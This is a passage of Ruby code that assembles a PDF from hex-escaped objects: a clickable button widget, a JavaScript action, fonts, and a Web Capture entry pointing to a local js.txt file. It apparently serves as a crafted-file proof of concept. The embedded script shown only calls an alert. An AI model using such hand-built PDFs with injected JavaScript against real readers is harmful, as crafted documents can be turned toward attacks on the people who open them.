"\xd\x3c\x3c\x2f\x41\x6c\x74\x65\x72\x6e\x61\x74\x65\x2f\x44\x65\x76\x69\x63\x65\x52\x47\x42\x2f\x46\x69\x6c\x74\x65\x72\x2f\x46\x6c\x61\x74\x65\x44\x65\x63\x6f\x64\x65\x2f\x4c\x65\x6e\x67\x74\x68\x20\x32\x35\x37\x34\x2f\x4e\x20\x33\x3e\x3e\x73\x74\x72\x65\x61\x6d\xd\x48\x89\x9c\x96\x79\x54\x53\x77\x16\xc7\x7f\x6f\xc9\x9e\x90\x95\xb0\xc3\x63\xd\x5b\x80\xb0\x6\x90\x35\x6c\x61\x91\x1d\x4\x51\x8\x49\x8\x1\x12\x42\x48\xd8\x5\x41\x44\x5\x14\x45\x44\x84\xaa\x95\x32\xd6\x6d\x74\x46\x4f\x45\x9d\x2e\xae\x63\xad\xe\xd6\x7d\xea\xd2\x3\xf5\x30\xea\xe8\x38\xb4\x16\xd7\x8e\x9d\x17\x38\x47\x9d\x4e\x67\xa6\xd3\xef\x1f\xef\xf7\x39\xf7\x77\xef\xef\xdd\xdf\xbd\xf7\x9d\xf3\x0\xa0\x27\xa5\xaa\xb5\xd5\x30\xb\x0\x8d\xd6\xa0\xcf\x4a\x8c\xc5\x16\x15\x14\x62\xa4\x9\x0\x3\xd\x20\x2\x11\x0\x32\x79\xad\x2e\x2d\x3b\x21\x7\xe0\x92\xc6\x4b\xb0\x5a\xdc\x9\xfc\x8b\x9e\x5e\x7\x90\x69\xbd\x22\x4c\xca\xc0\x30\xf0\xff\x89\x2d\xd7\xe9\xd\x0\x40\x19\x38\x7\x28\x94\xb5\x72\x9c\x3b\x71\xae\xaa\x37\xe8\x4c\xf6\x19\x9c\x79\xa5\x95\x26\x86\x51\x13\xeb\xf1\x4\x71\xb6\x34\xb1\x6a\x9e\xbd\xe7\x7c\xe6\x39\xda\xc4\xd\x8d\x56\x81\xb3\x29\x67\x9d\x42\xa3\x30\xf1\x69\x9c\x57\xd7\x19\x95\x38\x23\xa9\x38\x77\xd5\xa9\x95\xf5\x38\x5f\xc5\xd9\xa5\xca\xa8\x51\xe3\xfc\xdc\x14\xab\x51\xca\x6a\x1\x40\xe9\x26\xbb\x41\x29\x2f\xc7\xd9\xf\x67\xba\x3e\x27\x4b\x82\xf3\x2\x0\xc8\x74\xd5\x3b\x5c\xfa\xe\x1b\x94\xd\x6\xd3\xa5\x24\xd5\xba\x46\xbd\x5a\x55\x6e\xc0\xdc\xe5\x1e\x98\x28\x34\x54\x8c\x25\x29\xeb\xab\x94\x6\x83\x30\x43\x26\xaf\x94\xe9\x15\x98\xa4\x5a\xa3\x93\x69\x1b\x1\x98\xbf\xf3\x9c\x38\xa6\xda\x62\x78\x91\x83\x45\xa1\xc1\xc1\x42\x7f\x1f\xd1\x3b\x85\xfa\xaf\x9b\xbf\x50\xa6\xde\xce\xd3\x93\xcc\xb9\x9e\x41\xfc\xb\x6f\x6d\x3f\xe7\x57\x3d\xd\x80\x78\x16\xaf\xcd\xfa\xb7\xb6\xd2\x2d\x0\x8c\xaf\x4\xc0\xf2\xe6\x5b\x9b\xcb\xfb\x0\x30\xf1\xbe\x1d\xbe\xf8\xce\x7d\xf8\xa6\x79\x29\x37\x18\x74\x61\xbe\xbe\xf5\xf5\xf5\x3e\x6a\xa5\xdc\xc7\x54\xd0\x37\xfa\x9f\xe\xbf\x40\xef\xbc\xcf\xc7\x74\xdc\x9b\xf2\x60\x71\xca\x32\x99\xb1\xca\x80\x99\xea\x2
6\xaf\xae\xaa\x36\xea\xb1\x5a\x9d\x4c\xae\xc4\x84\x3f\x1d\xe2\x5f\x1d\xf8\xf3\x79\x78\x67\x29\xcb\x94\x7a\xa5\x16\x8f\xc8\xc3\xa7\x4c\xad\x55\xe1\xed\xd6\x2a\xd4\x6\x75\xb5\x16\x53\x6b\xff\x53\x13\x7f\x65\xd8\x4f\x34\x3f\xd7\xb8\xb8\x63\xaf\x1\xaf\xd8\x7\xb0\x2e\xf2\x0\xf2\xb7\xb\x0\xe5\xd2\x0\x52\xb4\xd\xdf\x81\xde\xf4\x2d\x95\x92\x7\x32\xf0\x35\xdf\xe1\xde\xfc\xdc\xcf\x9\xfa\xf7\x53\xe1\x3e\xd3\xa3\x56\xad\x9a\x8b\x93\x64\xe5\x60\x72\xa3\xbe\x6e\x7e\xcf\xf4\x59\x2\x2\xa0\x2\x26\xe0\x1\x2b\x60\xf\x9c\x81\x3b\x10\x2\x7f\x10\x2\xc2\x41\x34\x88\x7\xc9\x20\x1d\xe4\x80\x2\xb0\x14\xc8\x41\x39\xd0\x0\x3d\xa8\x7\x2d\xa0\x1d\x74\x81\x1e\xb0\x1e\x6c\x2\xc3\x60\x3b\x18\x3\xbb\xc1\x7e\x70\x10\x8c\x83\x8f\xc1\x9\xf0\x47\x70\x1e\x7c\x9\xae\x81\x5b\x60\x12\x4c\x83\x87\x60\x6\x3c\x5\xaf\x20\x8\x22\x41\xc\x88\xb\x59\x41\xe\x90\x2b\xe4\x5\xf9\x43\x62\x28\x12\x8a\x87\x52\xa1\x2c\xa8\x0\x2a\x81\x54\x90\x16\x32\x42\x2d\xd0\xd\xa8\x7\xea\x87\x86\xa1\x1d\xd0\x6e\xe8\xf7\xd0\x51\xe8\x4\x74\xe\xba\x4\x7d\x5\x4d\x41\xf\xa0\xef\xa0\x97\x30\x2\xd3\x61\x1e\x6c\x7\xbb\xc1\xbe\xb0\x18\x8e\x81\x53\xe0\x1c\x78\x9\xac\x82\x6b\xe0\x26\xb8\x13\x5e\x7\xf\xc1\xa3\xf0\x3e\xf8\x30\x7c\x2\x3e\xf\x5f\x83\x27\xe1\x87\xf0\x2c\x2\x10\x1a\xc2\x47\x1c\x11\x21\x22\x46\x24\x48\x3a\x52\x88\x94\x21\x7a\xa4\x15\xe9\x46\x6\x91\x51\x64\x3f\x72\xc\x39\x8b\x5c\x41\x26\x91\x47\xc8\xb\x94\x88\x72\x51\xc\x15\xa2\xe1\x68\x12\x9a\x8b\xca\xd1\x1a\xb4\x15\xed\x45\x87\xd1\x5d\xe8\x61\xf4\x34\x7a\x5\x9d\x42\x67\xd0\xd7\x4\x6\xc1\x96\xe0\x45\x8\x23\x48\x9\x8b\x8\x2a\x42\x3d\xa1\x8b\x30\x48\xd8\x49\xf8\x88\x70\x86\x70\x8d\x30\x4d\x78\x4a\x24\x12\xf9\x44\x1\x31\x84\x98\x44\x2c\x20\x56\x10\x9b\x89\xbd\xc4\xad\xc4\x3\xc4\xe3\xc4\x4b\xc4\xbb\xc4\x59\x12\x89\x64\x45\xf2\x22\x45\x90\xd2\x49\x32\x92\x81\xd4\x45\xda\x42\xda\x47\xfa\x8c\x74\x99\x34\x4d\x7a\x4e\xa6\x91\x1d\xc8\xfe\xe4\x4\x72\x21\x59\x4b\xee\x20\xf\x92\xf7\x90\x3f\x25\x5f\x26\xdf\x23\xbf\xa2\xb0\x28\xae\x94\x30\x4a\x3a\x45\x41\x69\xa4\xf4\x51\xc6\x28\xc7\x28\x17\x29\xd3\x94\
x57\x54\x36\x55\x40\x8d\xa0\xe6\x50\x2b\xa8\xed\xd4\x21\xea\x7e\xea\x19\xea\x6d\xea\x13\x1a\x8d\xe6\x44\xb\xa5\x65\xd2\xd4\xb4\xe5\xb4\x21\xda\xef\x68\x9f\xd3\xa6\x68\x2f\xe8\x1c\xba\x27\x5d\x42\x2f\xa2\x1b\xe9\xeb\xe8\x1f\xd2\x8f\xd3\xbf\xa2\x3f\x61\x30\x18\x6e\x8c\x68\x46\x21\xc3\xc0\x58\xc7\xd8\xcd\x38\xc5\xf8\x9a\xf1\xdc\x8c\x6b\xe6\x63\x26\x35\x53\x98\xb5\x99\x8d\x98\x1d\x36\xbb\x6c\xf6\x98\x49\x61\xba\x32\x63\x98\x4b\x99\x4d\xcc\x41\xe6\x21\xe6\x45\xe6\x23\x16\x85\xe5\xc6\x92\xb0\x64\xac\x56\xd6\x8\xeb\x28\xeb\x6\x6b\x96\xcd\x65\x8b\xd8\xe9\x6c\xd\xbb\x97\xbd\x87\x7d\x8e\x7d\x9f\x43\xe2\xb8\x71\xe2\x39\xd\x4e\x27\xe7\x3\xce\x29\xce\x5d\x2e\xc2\x75\xe6\x4a\xb8\x72\xee\xd\xee\x18\xf7\xc\x77\x9a\x47\xe4\x9\x78\x52\x5e\x5\xaf\x87\xf7\x5b\xde\x4\x6f\xc6\x9c\x63\x1e\x68\x9e\x67\xde\x60\x3e\x62\xfe\x89\xf9\x24\x1f\xe1\xbb\xf1\xa5\xfc\x2a\x7e\x1f\xff\x20\xff\x3a\xff\xa5\x85\x9d\x45\x8c\x85\xd2\x62\x8d\xc5\x7e\x8b\xcb\x16\xcf\x2c\x6d\x2c\xa3\x2d\x95\x96\xdd\x96\x7\x2c\xaf\x59\xbe\xb4\xc2\xac\xe2\xad\x2a\xad\x36\x58\x8d\x5b\xdd\xb1\x46\xad\x3d\xad\x33\xad\xeb\xad\xb7\x59\x9f\xb1\x7e\x64\xc3\xb3\x9\xb7\x91\xdb\x74\xdb\x1c\xb4\xb9\x69\xb\xdb\x7a\xda\x66\xd9\x36\xdb\x7e\x60\x7b\xc1\x76\xd6\xce\xde\x2e\xd1\x4e\x67\xb7\xc5\xee\x94\xdd\x23\x7b\xbe\x7d\xb4\x7d\x85\xfd\x80\xfd\xa7\xf6\xf\x1c\xb8\xe\x91\xe\x6a\x87\x1\x87\xcf\x1c\xfe\x8a\x99\x63\x31\x58\x15\x36\x84\x9d\xc6\x66\x1c\x6d\x1d\x93\x1c\x8d\x8e\x3b\x1c\x27\x1c\x5f\x39\x9\x9c\x72\x9d\x3a\x9c\xe\x38\xdd\x71\xa6\x3a\x8b\x9d\xcb\x9c\x7\x9c\x4f\x3a\xcf\xb8\x38\xb8\xa4\xb9\xb4\xb8\xec\x75\xb9\xe9\x4a\x71\x15\xbb\x96\xbb\x6e\x76\x3d\xeb\xfa\xcc\x4d\xe0\x96\xef\xb6\xca\x6d\xdc\xed\xbe\xc0\x52\x20\x15\x34\x9\xf6\xd\x6e\xbb\x33\xdc\xa3\xdc\x6b\xdc\x47\xdd\xaf\x7a\x10\x3d\xc4\x1e\x95\x1e\x5b\x3d\xbe\xf4\x84\x3d\x83\x3c\xcb\x3d\x47\x3c\x2f\x7a\xc1\x5e\xc1\x5e\x6a\xaf\xad\x5e\x97\xbc\x9\xde\xa1\xde\x5a\xef\x51\xef\x1b\x42\xba\x30\x46\x58\x27\xdc\x2b\x9c\xf2\xe1\xfb\xa4\xfa\x74\xf8\x8c\xfb\x3c\xf6\x75\xf1\x2d\xf4\xdd\xe0\x7b\xd6\xf7\
xb5\x5f\x90\x5f\x95\xdf\x98\xdf\x2d\x11\x47\x94\x2c\xea\x10\x1d\x13\x7d\xe7\xef\xe9\x2f\xf7\x1f\xf1\xbf\x1a\xc0\x8\x48\x8\x68\xb\x38\x12\xf0\x6d\xa0\x57\xa0\x32\x70\x5b\xe0\x9f\x83\xb8\x41\x69\x41\xab\x82\x4e\x6\xfd\x23\x38\x24\x58\x1f\xbc\x3f\xf8\x41\x88\x4b\x48\x49\xc8\x7b\x21\x37\xc4\x3c\x71\x86\xb8\x57\xfc\x79\x28\x21\x34\x36\xb4\x2d\xf4\xe3\xd0\x17\x61\xc1\x61\x86\xb0\x83\x61\x7f\xf\x17\x86\x57\x86\xef\x9\xbf\xbf\x40\xb0\x40\xb9\x60\x6c\xc1\xdd\x8\xa7\x8\x59\xc4\x8e\x88\xc9\x48\x2c\xb2\x24\xf2\xfd\xc8\xc9\x28\xc7\x28\x59\xd4\x68\xd4\x37\xd1\xce\xd1\x8a\xe8\x9d\xd1\xf7\x62\x3c\x62\x2a\x62\xf6\xc5\x3c\x8e\xf5\x8b\xd5\xc7\x7e\x14\xfb\x4c\x12\x26\x59\x26\x39\x1e\x87\xc4\x25\xc6\x75\xc7\x4d\xc4\x73\xe2\x73\xe3\x87\xe3\xbf\x4e\x70\x4a\x50\x25\xec\x4d\x98\x49\xc\x4a\x6c\x4e\x3c\x9e\x44\x48\x4a\x49\xda\x90\x74\x43\x6a\x27\x95\x4b\x77\x4b\x67\x92\x43\x92\x97\x25\x9f\x4e\xa1\xa7\x64\xa7\xc\xa7\x7c\x93\xea\x99\xaa\x4f\x3d\x96\x6\xa7\x25\xa7\x6d\x4c\xbb\xbd\xd0\x75\xa1\x76\xe1\x78\x3a\x48\x97\xa6\x6f\x4c\xbf\x93\x21\xc8\xa8\xc9\xf8\x43\x26\x31\x33\x23\x73\x24\xf3\x2f\x59\xa2\xac\x96\xac\xb3\xd9\xdc\xec\xe2\xec\x3d\xd9\x4f\x73\x62\x73\xfa\x72\x6e\xe5\xba\xe7\x1a\x73\x4f\xe6\x31\xf3\x8a\xf2\x76\xe7\x3d\xcb\x8f\xcb\xef\xcf\x9f\x5c\xe4\xbb\x68\xd9\xa2\xf3\x5\xd6\x5\xea\x82\x23\x85\xa4\xc2\xbc\xc2\x9d\x85\xb3\x8b\xe3\x17\x6f\x5a\x3c\x5d\x14\x54\xd4\x55\x74\x7d\x89\x60\x49\xc3\x92\x73\x4b\xad\x97\x56\x2d\xfd\xa4\x98\x59\x2c\x2b\x3e\x54\x42\x28\xc9\x2f\xd9\x53\xf2\x83\x2c\x5d\x36\x2a\x9b\x2d\x95\x96\xbe\x57\x3a\x23\x97\xc8\x37\xcb\x1f\x2a\xa2\x15\x3\x8a\x7\xca\x8\x65\xbf\xf2\x5e\x59\x44\x59\x7f\xd9\x7d\x55\x84\x6a\xa3\xea\x41\x79\x54\xf9\x60\xf9\x23\xb5\x44\x3d\xac\xfe\xb6\x22\xa9\x62\x7b\xc5\xb3\xca\xf4\xca\xf\x2b\x7f\xac\xca\xaf\x3a\xa0\x21\x6b\x4a\x34\x47\xb5\x1c\x6d\xa5\xf6\x74\xb5\x7d\x75\x43\xf5\x25\x9d\x97\xae\x4b\x37\x59\x13\x56\xb3\xa9\x66\x46\x9f\xa2\xdf\x59\xb\xd5\x2e\xa9\x3d\x62\xe0\xe1\x3f\x53\x17\x8c\xee\xc6\x95\xc6\xa9\xba\xc8\xba\x91\xba\xe7\xf5\x79\xf5\x87\x1a\xd
8\xd\xda\x86\xb\x8d\x9e\x8d\x6b\x1a\xef\x35\x25\x34\xfd\xa6\x19\x6d\x96\x37\x9f\x6c\x71\x6c\x69\x6f\x99\x5a\x16\xb3\x6c\x47\x2b\xd4\x5a\xda\x7a\xb2\xcd\xb9\xad\xb3\x6d\x7a\x79\xe2\xf2\x5d\xed\xd4\xf6\xca\xf6\x3f\x75\xf8\x75\xf4\x77\x7c\xbf\x22\x7f\xc5\xb1\x4e\xbb\xce\xe5\x9d\x77\x57\x26\xae\xdc\xdb\x65\xd6\xa5\xef\xba\xb1\x2a\x7c\xd5\xf6\xd5\xe8\x6a\xf5\xea\x89\x35\x1\x6b\xb6\xac\x79\xdd\xad\xe8\xfe\xa2\xc7\xaf\x67\xb0\xe7\x87\x5e\x79\xef\x17\x6b\x45\x6b\x87\xd6\xfe\xb8\xae\x6c\xdd\x44\x5f\x70\xdf\xb6\xf5\xc4\xf5\xda\xf5\xd7\x37\x44\x6d\xd8\xd5\xcf\xee\x6f\xea\xbf\xbb\x31\x6d\xe3\xe1\x1\x6c\xa0\x7b\xe0\xfb\x4d\xc5\x9b\xce\xd\x6\xe\x6e\xdf\x4c\xdd\x6c\xdc\x3c\x39\x94\xfa\x4f\x0\xa4\x1\x5b\xfe\x98\xb8\x99\x24\x99\x90\x99\xfc\x9a\x68\x9a\xd5\x9b\x42\x9b\xaf\x9c\x1c\x9c\x89\x9c\xf7\x9d\x64\x9d\xd2\x9e\x40\x9e\xae\x9f\x1d\x9f\x8b\x9f\xfa\xa0\x69\xa0\xd8\xa1\x47\xa1\xb6\xa2\x26\xa2\x96\xa3\x6\xa3\x76\xa3\xe6\xa4\x56\xa4\xc7\xa5\x38\xa5\xa9\xa6\x1a\xa6\x8b\xa6\xfd\xa7\x6e\xa7\xe0\xa8\x52\xa8\xc4\xa9\x37\xa9\xa9\xaa\x1c\xaa\x8f\xab\x2\xab\x75\xab\xe9\xac\x5c\xac\xd0\xad\x44\xad\xb8\xae\x2d\xae\xa1\xaf\x16\xaf\x8b\xb0\x0\xb0\x75\xb0\xea\xb1\x60\xb1\xd6\xb2\x4b\xb2\xc2\xb3\x38\xb3\xae\xb4\x25\xb4\x9c\xb5\x13\xb5\x8a\xb6\x1\xb6\x79\xb6\xf0\xb7\x68\xb7\xe0\xb8\x59\xb8\xd1\xb9\x4a\xb9\xc2\xba\x3b\xba\xb5\xbb\x2e\xbb\xa7\xbc\x21\xbc\x9b\xbd\x15\xbd\x8f\xbe\xd\xbe\x84\xbe\xff\xbf\x7a\xbf\xf5\xc0\x70\xc0\xec\xc1\x67\xc1\xe3\xc2\x5f\xc2\xdb\xc3\x58\xc3\xd4\xc4\x51\xc4\xce\xc5\x4b\xc5\xc8\xc6\x46\xc6\xc3\xc7\x41\xc7\xbf\xc8\x3d\xc8\xbc\xc9\x3a\xc9\xb9\xca\x38\xca\xb7\xcb\x36\xcb\xb6\xcc\x35\xcc\xb5\xcd\x35\xcd\xb5\xce\x36\xce\xb6\xcf\x37\xcf\xb8\xd0\x39\xd0\xba\xd1\x3c\xd1\xbe\xd2\x3f\xd2\xc1\xd3\x44\xd3\xc6\xd4\x49\xd4\xcb\xd5\x4e\xd5\xd1\xd6\x55\xd6\xd8\xd7\x5c\xd7\xe0\xd8\x64\xd8\xe8\xd9\x6c\xd9\xf1\xda\x76\xda\xfb\xdb\x80\xdc\x5\xdc\x8a\xdd\x10\xdd\x96\xde\x1c\xde\xa2\xdf\x29\xdf\xaf\xe0\x36\xe0\xbd\xe1\x44\xe1\xcc\xe2\x53\xe2\xdb\xe3\x63\xe3\xeb\xe4\x73\xe4\xfc\xe5\x84\xe6\xd\xe
6\x96\xe7\x1f\xe7\xa9\xe8\x32\xe8\xbc\xe9\x46\xe9\xd0\xea\x5b\xea\xe5\xeb\x70\xeb\xfb\xec\x86\xed\x11\xed\x9c\xee\x28\xee\xb4\xef\x40\xef\xcc\xf0\x58\xf0\xe5\xf1\x72\xf1\xff\xf2\x8c\xf3\x19\xf3\xa7\xf4\x34\xf4\xc2\xf5\x50\xf5\xde\xf6\x6d\xf6\xfb\xf7\x8a\xf8\x19\xf8\xa8\xf9\x38\xf9\xc7\xfa\x57\xfa\xe7\xfb\x77\xfc\x7\xfc\x98\xfd\x29\xfd\xba\xfe\x4b\xfe\xdc\xff\x6d\xff\xff\x2\xc\x0\xf7\x84\xf3\xfb\xd\x65\x6e\x64\x73\x74\x72\x65\x61\x6d\xd") + add_object(38, "\xd\x3c\x3c\x2f\x41\x20\x34\x33\x20\x30\x20\x52\x2f\x41\x50\x3c\x3c\x2f\x4e\x20\x35\x31\x20\x30\x20\x52\x3e\x3e\x2f\x44\x41\x28\x2f\x48\x65\x42\x6f\x20\x31\x32\x20\x54\x66\x20\x30\x20\x67\x29\x2f\x46\x20\x34\x2f\x46\x54\x2f\x42\x74\x6e\x2f\x46\x66\x20\x36\x35\x35\x33\x36\x2f\x4d\x4b\x3c\x3c\x2f\x42\x47\x5b\x31\x2e\x30\x20\x31\x2e\x30\x20\x31\x2e\x30\x5d\x2f\x43\x41\x28\x43\x6c\x69\x63\x6b\x20\x6d\x65\x29\x2f\x54\x50\x20\x31\x3e\x3e\x2f\x50\x20\x32\x36\x20\x30\x20\x52\x2f\x52\x65\x63\x74\x5b\x30\x2e\x30\x20\x30\x2e\x36\x31\x34\x38\x36\x38\x20\x36\x31\x31\x2e\x33\x38\x34\x20\x37\x39\x32\x2e\x30\x5d\x2f\x53\x75\x62\x74\x79\x70\x65\x2f\x57\x69\x64\x67\x65\x74\x2f\x54\x28\x62\x74\x6e\x43\x6c\x69\x63\x6b\x4d\x65\x29\x2f\x54\x55\x28\x43\x6c\x69\x63\x6b\x20\x6d\x65\x29\x2f\x54\x79\x70\x65\x2f\x41\x6e\x6e\x6f\x74\x3e\x3e\xd") + add_object(43, "\xd\x3c\x3c\x2f\x4a\x53\x20\x34\x36\x20\x30\x20\x52\x2f\x53\x2f\x4a\x61\x76\x61\x53\x63\x72\x69\x70\x74\x3e\x3e\xd") + add_object(51, 
"\xd\x3c\x3c\x2f\x42\x42\x6f\x78\x5b\x30\x2e\x30\x20\x30\x2e\x30\x20\x36\x31\x31\x2e\x33\x38\x34\x20\x37\x39\x31\x2e\x33\x38\x35\x5d\x2f\x46\x6f\x72\x6d\x54\x79\x70\x65\x20\x31\x2f\x4c\x65\x6e\x67\x74\x68\x20\x36\x34\x2f\x4d\x61\x74\x72\x69\x78\x5b\x31\x2e\x30\x20\x30\x2e\x30\x20\x30\x2e\x30\x20\x31\x2e\x30\x20\x30\x2e\x30\x20\x30\x2e\x30\x5d\x2f\x52\x65\x73\x6f\x75\x72\x63\x65\x73\x3c\x3c\x2f\x50\x72\x6f\x63\x53\x65\x74\x5b\x2f\x50\x44\x46\x5d\x3e\x3e\x2f\x53\x75\x62\x74\x79\x70\x65\x2f\x46\x6f\x72\x6d\x2f\x54\x79\x70\x65\x2f\x58\x4f\x62\x6a\x65\x63\x74\x3e\x3e\x73\x74\x72\x65\x61\x6d\xd\x31\x20\x67\xd\x30\x20\x30\x20\x36\x31\x31\x2e\x33\x38\x33\x38\x20\x37\x39\x31\x2e\x33\x38\x35\x31\x20\x72\x65\xd\x66\xd\x71\xd\x31\x20\x31\x20\x36\x30\x39\x2e\x33\x38\x33\x38\x20\x37\x38\x39\x2e\x33\x38\x35\x31\x20\x72\x65\xd\x57\xd\x6e\xd\x51\xd\x65\x6e\x64\x73\x74\x72\x65\x61\x6d\xd") + # add_object(46, "\xd\x3c\x3c\x2f\x46\x69\x6c\x74\x65\x72\x5b\x2f\x46\x6c\x61\x74\x65\x44\x65\x63\x6f\x64\x65\x5d\x2f\x4c\x65\x6e\x67\x74\x68\x20\x33\x30\x32\x3e\x3e\x73\x74\x72\x65\x61\x6d\xd\x48\x89\x84\x91\x4d\x4f\xc3\x30\xc\x86\xef\x95\xfa\x1f\xac\x5d\x92\x6a\x25\x41\xe2\x38\xc1\x85\x2b\x70\xe0\xca\x10\x4a\x13\xaf\xd\x34\x49\x95\xba\xfb\x10\xda\x7f\x27\x5d\xe9\x18\x12\x12\x3e\x58\x4e\xe2\xf7\xf5\x23\x67\x33\x78\x4d\x36\x78\xc0\x3d\xea\x81\x90\x57\xd1\x9a\x1a\x4b\xd0\xce\x14\xf0\x99\x67\x90\x22\x22\xd\xd1\xc3\xf4\x24\x6a\xa4\xfb\x56\xf5\x3d\x2f\xc4\x26\xc4\x27\xe5\x90\xb3\x77\xb5\x55\xa2\x55\xbe\x16\xcf\x83\x27\xeb\x90\x15\x93\x74\x8c\x51\xf1\x88\xd4\x4\xc3\x59\x2a\xe7\x8e\xd2\xf\x6d\x5b\x8\xeb\xb7\xe1\x3\xf9\x78\xf8\xbe\x19\x51\xf8\x38\x7f\x95\x67\xc7\x3c\xcb\x33\xbb\xe1\x3b\xeb\x4d\xd8\x89\x37\xd5\x75\x67\x2c\x8a\x87\xb1\x94\x72\x1e\xb4\x55\x11\x3a\x45\xd\xdc\x2\x93\xce\x93\xec\x8d\x56\xd1\x48\x17\x2a\xdb\x62\x44\x65\x30\x8a\x2e\x68\x41\x7b\x62\xab\x1f\xc0\x5f\x3a\xa3\x48\x4d\x49\x7\x27\x94\x9\x15\x8a\x49\xfa\xaf\xcf\xbc\xc3\xb\xd8\x12\x5e\x98\xec\xf\x3d\xa1\x93\x95\xf5\xb2\x6f\x58\xc9\xae\x
74\x4a\xa8\x9b\x0\xeb\xc5\x43\x88\xe8\xc0\x76\xfd\xe0\xd6\xb\xb8\x3\x6\xcb\x13\xcb\x6b\x71\x61\x7c\x61\x28\x54\x22\x20\x7e\xc2\x5d\xa6\x6e\x9d\x70\x8\xd\x2b\xe1\x66\x56\x1c\x41\x2b\xd2\xd\xc7\xf3\xa6\xfe\xf6\x48\xbf\x7c\x7d\xd6\xa4\x55\x7f\x9\x30\x0\x67\xa5\x9f\x47\xd\x65\x6e\x64\x73\x74\x72\x65\x61\x6d\xd") + + js = Zlib::Deflate.deflate("window._app.alert('HELLO WORLD', 3);") + add_object(46, "\x0d<</Filter[/FlateDecode]/Length 302>>stream\x0d#{js}\x0dendstream\x0d") + + + add_object(8, "\xd\x3c\x3c\x2f\x43\x6f\x75\x6e\x74\x20\x31\x2f\x46\x69\x72\x73\x74\x20\x39\x20\x30\x20\x52\x2f\x4c\x61\x73\x74\x20\x39\x20\x30\x20\x52\x2f\x50\x61\x72\x65\x6e\x74\x20\x37\x20\x30\x20\x52\x2f\x54\x69\x74\x6c\x65\x28\x4c\x6f\x63\x61\x6c\x20\x44\x69\x73\x6b\x29\x3e\x3e\xd") + add_object(9, "\xd\x3c\x3c\x2f\x44\x65\x73\x74\x5b\x32\x36\x20\x30\x20\x52\x2f\x58\x59\x5a\x20\x30\x20\x37\x39\x32\x20\x6e\x75\x6c\x6c\x5d\x2f\x50\x61\x72\x65\x6e\x74\x20\x38\x20\x30\x20\x52\x2f\x53\x45\x20\x31\x35\x20\x30\x20\x52\x2f\x54\x69\x74\x6c\x65\x28\xfe\xff\x0\x6a\x0\x73\x0\x2e\x0\x74\x0\x78\x0\x74\x29\x3e\x3e\xd") + add_object(17, "\xd\x3c\x3c\x2f\x4e\x61\x6d\x65\x73\x5b\x33\x35\x20\x30\x20\x52\x20\x32\x30\x20\x30\x20\x52\x5d\x3e\x3e\xd") + add_object(18, "\xd\x3c\x3c\x2f\x4e\x61\x6d\x65\x73\x5b\x31\x39\x20\x30\x20\x52\x20\x32\x30\x20\x30\x20\x52\x5d\x3e\x3e\xd") + add_object(19, "\xd\x28\x66\x69\x6c\x65\x3a\x2f\x2f\x2f\x43\x7c\x2f\x74\x65\x6d\x70\x2f\x6a\x73\x2e\x74\x78\x74\x29\xd") + add_object(20, "\xd\x3c\x3c\x2f\x43\x54\x28\x74\x65\x78\x74\x2f\x70\x6c\x61\x69\x6e\x29\x2f\x49\x44\x20\x33\x35\x20\x30\x20\x52\x2f\x4f\x5b\x32\x36\x20\x30\x20\x52\x5d\x2f\x53\x2f\x53\x50\x53\x2f\x53\x49\x20\x32\x31\x20\x30\x20\x52\x2f\x54\x28\xfe\xff\x0\x6a\x0\x73\x0\x2e\x0\x74\x0\x78\x0\x74\x29\x2f\x54\x53\x28\x44\x3a\x32\x30\x31\x34\x30\x33\x33\x31\x31\x31\x33\x35\x35\x32\x5a\x29\x3e\x3e\xd") + add_object(21, 
"\xd\x3c\x3c\x2f\x41\x55\x20\x31\x39\x20\x30\x20\x52\x2f\x54\x53\x28\x44\x3a\x32\x30\x31\x34\x30\x33\x33\x31\x31\x31\x33\x35\x35\x32\x5a\x29\x3e\x3e\xd") + add_object(39, "\xd\x3c\x3c\x2f\x42\x61\x73\x65\x46\x6f\x6e\x74\x2f\x48\x65\x6c\x76\x65\x74\x69\x63\x61\x2d\x42\x6f\x6c\x64\x2f\x45\x6e\x63\x6f\x64\x69\x6e\x67\x20\x34\x35\x20\x30\x20\x52\x2f\x4e\x61\x6d\x65\x2f\x48\x65\x42\x6f\x2f\x53\x75\x62\x74\x79\x70\x65\x2f\x54\x79\x70\x65\x31\x2f\x54\x79\x70\x65\x2f\x46\x6f\x6e\x74\x3e\x3e\xd") + add_object(47, "\xd\x3c\x3c\x2f\x42\x61\x73\x65\x46\x6f\x6e\x74\x2f\x48\x65\x6c\x76\x65\x74\x69\x63\x61\x2f\x45\x6e\x63\x6f\x64\x69\x6e\x67\x20\x34\x35\x20\x30\x20\x52\x2f\x4e\x61\x6d\x65\x2f\x48\x65\x6c\x76\x2f\x53\x75\x62\x74\x79\x70\x65\x2f\x54\x79\x70\x65\x31\x2f\x54\x79\x70\x65\x2f\x46\x6f\x6e\x74\x3e\x3e\xd") + add_object(48, "\xd\x3c\x3c\x2f\x42\x61\x73\x65\x46\x6f\x6e\x74\x2f\x5a\x61\x70\x66\x44\x69\x6e\x67\x62\x61\x74\x73\x2f\x4e\x61\x6d\x65\x2f\x5a\x61\x44\x62\x2f\x53\x75\x62\x74\x79\x70\x65\x2f\x54\x79\x70\x65\x31\x2f\x54\x79\x70\x65\x2f\x46\x6f\x6e\x74\x3e\x3e\xd") + add_object(45, 
"\xd\x3c\x3c\x2f\x44\x69\x66\x66\x65\x72\x65\x6e\x63\x65\x73\x5b\x32\x34\x2f\x62\x72\x65\x76\x65\x2f\x63\x61\x72\x6f\x6e\x2f\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x64\x6f\x74\x61\x63\x63\x65\x6e\x74\x2f\x68\x75\x6e\x67\x61\x72\x75\x6d\x6c\x61\x75\x74\x2f\x6f\x67\x6f\x6e\x65\x6b\x2f\x72\x69\x6e\x67\x2f\x74\x69\x6c\x64\x65\x20\x33\x39\x2f\x71\x75\x6f\x74\x65\x73\x69\x6e\x67\x6c\x65\x20\x39\x36\x2f\x67\x72\x61\x76\x65\x20\x31\x32\x38\x2f\x62\x75\x6c\x6c\x65\x74\x2f\x64\x61\x67\x67\x65\x72\x2f\x64\x61\x67\x67\x65\x72\x64\x62\x6c\x2f\x65\x6c\x6c\x69\x70\x73\x69\x73\x2f\x65\x6d\x64\x61\x73\x68\x2f\x65\x6e\x64\x61\x73\x68\x2f\x66\x6c\x6f\x72\x69\x6e\x2f\x66\x72\x61\x63\x74\x69\x6f\x6e\x2f\x67\x75\x69\x6c\x73\x69\x6e\x67\x6c\x6c\x65\x66\x74\x2f\x67\x75\x69\x6c\x73\x69\x6e\x67\x6c\x72\x69\x67\x68\x74\x2f\x6d\x69\x6e\x75\x73\x2f\x70\x65\x72\x74\x68\